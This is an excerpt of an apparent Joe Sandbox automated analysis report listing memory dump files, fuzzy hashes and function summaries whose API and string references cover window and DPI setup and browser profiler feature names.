Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID: :x}
API String ID: 0-3795852113
Opcode ID: 729590d6b87f14b952f51537cbd8ed46cebaba8bdca15d257d0d4d5385cccb70
Instruction ID: 8f8357ff74e63ec10da605cc56ea78a382d6da0078f544572680813b502d8343
Opcode Fuzzy Hash: 729590d6b87f14b952f51537cbd8ed46cebaba8bdca15d257d0d4d5385cccb70
Instruction Fuzzy Hash: 5D6178F3E093105BE304AE19EC94B2AB7C6DB94720F2B453DEEC4D3781E9395C014696

Function 6C5E0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: b52b42bda85c66c3e48c7190ebae43dec4472e127f9ccb6f6ebf100a486ce59d
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: C4220871E04629CFDB18CF98C890AADF7B2FF88304F54869AD44AA7745D731A985CF90

Function 6C62AC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52af545d568dcbb53ac0219e5e2f73da8361531149c34bb0c4f759951e6d74ee
Instruction ID: e8bba327453ad7cf276d7a6465b46917e556eebef9e8c14f7cc34b3c7c2b9d94
Opcode Fuzzy Hash: 52af545d568dcbb53ac0219e5e2f73da8361531149c34bb0c4f759951e6d74ee
Instruction Fuzzy Hash: 28F14B71A087454FD700CE28C8913AAB7E2EFC5318F158A1DE4D587782E7BC98498F96

Function 005C0A6D Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6777ee890d3c217bd1337d55dbda93867f0bfc84135ba3daf60702c8dc517134
Instruction ID: 0b85ab23b9cdff9a0da4ee981c6ccbe8acbc45d44243a1cef3d043782c931846
Opcode Fuzzy Hash: 6777ee890d3c217bd1337d55dbda93867f0bfc84135ba3daf60702c8dc517134
Instruction Fuzzy Hash: FE612CF3A182105BF3146A3DED447B6BAD6DB84320F1A863DEAC8D77C4D53A8C054792

Function 005739F3 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e47d064f3ba7ebc9ecf464a71424485d9c1b810bc7b8831d60e38b0325380f2
Instruction ID: bd08a3bffa33d703cf8aad3706b8e340f36a063bb6cf01719e68651bf5426508
Opcode Fuzzy Hash: 5e47d064f3ba7ebc9ecf464a71424485d9c1b810bc7b8831d60e38b0325380f2
Instruction Fuzzy Hash: 6D5147F3A092005BF3186A19DC5577AB3DAEBD4321F2F453DDB85933C0E97A6804829A

Function 0055CA6C Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68c6a162d91e37f851e094edd08de5db9907f923ce8097a603eabd8106df270a
Instruction ID: 37c7841dc00e597017d9215809f81cfb4625bd4292dc5a3b754a4d2fc558a87d
Opcode Fuzzy Hash: 68c6a162d91e37f851e094edd08de5db9907f923ce8097a603eabd8106df270a
Instruction Fuzzy Hash: 504137F3F245204BF3485939DC553A6B6C6DBD4360F2B823D9A89E7788E93C5C0602C6

Function 0073503B Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eaa78e3c9ca98053320914e3848d5cb1e61e5773f43e2f04181008e565cae3d
Instruction ID: 9cf615ad59144d195156b3715a5934e13467527eb00b22731dd54adab2cc1613
Opcode Fuzzy Hash: 9eaa78e3c9ca98053320914e3848d5cb1e61e5773f43e2f04181008e565cae3d
Instruction Fuzzy Hash: 37115EF341DE08D7F24C6A35DC415BBF7E99B94310F35492DE2C392611E67A580156C6

Function 00269750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C6155F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C5EE1A5), ref: 6C615606
LoadLibraryW.KERNEL32(gdi32,?,6C5EE1A5), ref: 6C61560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C615633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C61563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C61566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C61567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C615696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6156B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6156CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6156E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6156FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C615716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C61572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C615748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C615761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C61577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C615793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6157A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6157BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6157D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6157EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6157FF

Strings

GetMonitorInfoW, xrefs: 6C6157A2
LoadIconW, xrefs: 6C61575B
CreateWindowExW, xrefs: 6C6156C5
StretchDIBits, xrefs: 6C6157CC
DeleteObject, xrefs: 6C6157F9
GetDpiForWindow, xrefs: 6C615690
gdi32, xrefs: 6C61560A
ShowWindow, xrefs: 6C6156DE
CreateSolidBrush, xrefs: 6C6157E4
SetWindowPos, xrefs: 6C6156F7
EnableNonClientDpiScaling, xrefs: 6C615666
LoadCursorW, xrefs: 6C615774
GetThreadDpiAwarenessContext, xrefs: 6C61562D
GetWindowDC, xrefs: 6C615710
SetWindowLongPtrW, xrefs: 6C6157B7
AreDpiAwarenessContextsEqual, xrefs: 6C615637
RegisterClassW, xrefs: 6C6156AC
ReleaseDC, xrefs: 6C615742
user32, xrefs: 6C615601
MonitorFromWindow, xrefs: 6C61578D
GetSystemMetricsForDpi, xrefs: 6C615677
FillRect, xrefs: 6C615729

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 79a913ec1a00996db87a9508d04389e6ed924d08e1dc61f76e2e363d2dc8b1f5
Instruction ID: 8348ef329a738cf179d4fb955133c0821b3a55d2ad60e5a9c178aeb2e40a17e6
Opcode Fuzzy Hash: 79a913ec1a00996db87a9508d04389e6ed924d08e1dc61f76e2e363d2dc8b1f5
Instruction Fuzzy Hash: 8451B8717057225FDB116F3E4DC4A267AF8AB86396F107425E929D2A41DF34C8018F7D

Function 6C5FCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C5C582D), ref: 6C5FCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C5C582D), ref: 6C5FCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C62FE98,?,?,?,?,?,6C5C582D), ref: 6C5FCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C5C582D), ref: 6C5FCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C5C582D), ref: 6C5FCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C5C582D), ref: 6C5FCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5C582D), ref: 6C5FCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C5FCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C5FCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C5FCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C5FCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C5FCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C5FCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C5FCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C5FCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C5FCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C5FCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C5FCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C5FCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C5FCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C5FCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C5FCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C5FCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C5FCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C5FCE8A

Strings

default, xrefs: 6C5FCC21
samplingallthreads, xrefs: 6C5FCE2C
fileio, xrefs: 6C5FCC92
stackwalk, xrefs: 6C5FCCF8
mainthreadio, xrefs: 6C5FCC7C
preferencereads, xrefs: 6C5FCD92
Unrecognized feature "%s"., xrefs: 6C5FCEA0
processcpu, xrefs: 6C5FCE6E
fileioall, xrefs: 6C5FCCA8
power, xrefs: 6C5FCE84
nativeallocations, xrefs: 6C5FCDA8
audiocallbacktracing, xrefs: 6C5FCDD4
noiostacks, xrefs: 6C5FCCBE
notimerresolutionchange, xrefs: 6C5FCE00
unregisteredthreads, xrefs: 6C5FCE58
markersallthreads, xrefs: 6C5FCE42
leaf, xrefs: 6C5FCC66
jsallocations, xrefs: 6C5FCD0E
seqstyle, xrefs: 6C5FCCE6
cpuallthreads, xrefs: 6C5FCE16
java, xrefs: 6C5FCC37
nostacksampling, xrefs: 6C5FCD7C
ipcmessages, xrefs: 6C5FCDBE
screenshots, xrefs: 6C5FCCD4

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 6d7e74da1bc4ae06b2e9f0d5f4615ef18a6312f02274169d29bce5d63614c25d
Instruction ID: b7d3344369a07d20bf55bf8d374863d31e7f3c0cbe7ea46e61b09f50a27652ce
Opcode Fuzzy Hash: 6d7e74da1bc4ae06b2e9f0d5f4615ef18a6312f02274169d29bce5d63614c25d
Instruction Fuzzy Hash: 0D5154A1A4527521FB2D71155D10BEE1445EF5324AF10583ADA2BE2E80FB09F60B8DFF

Function 6C5C4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

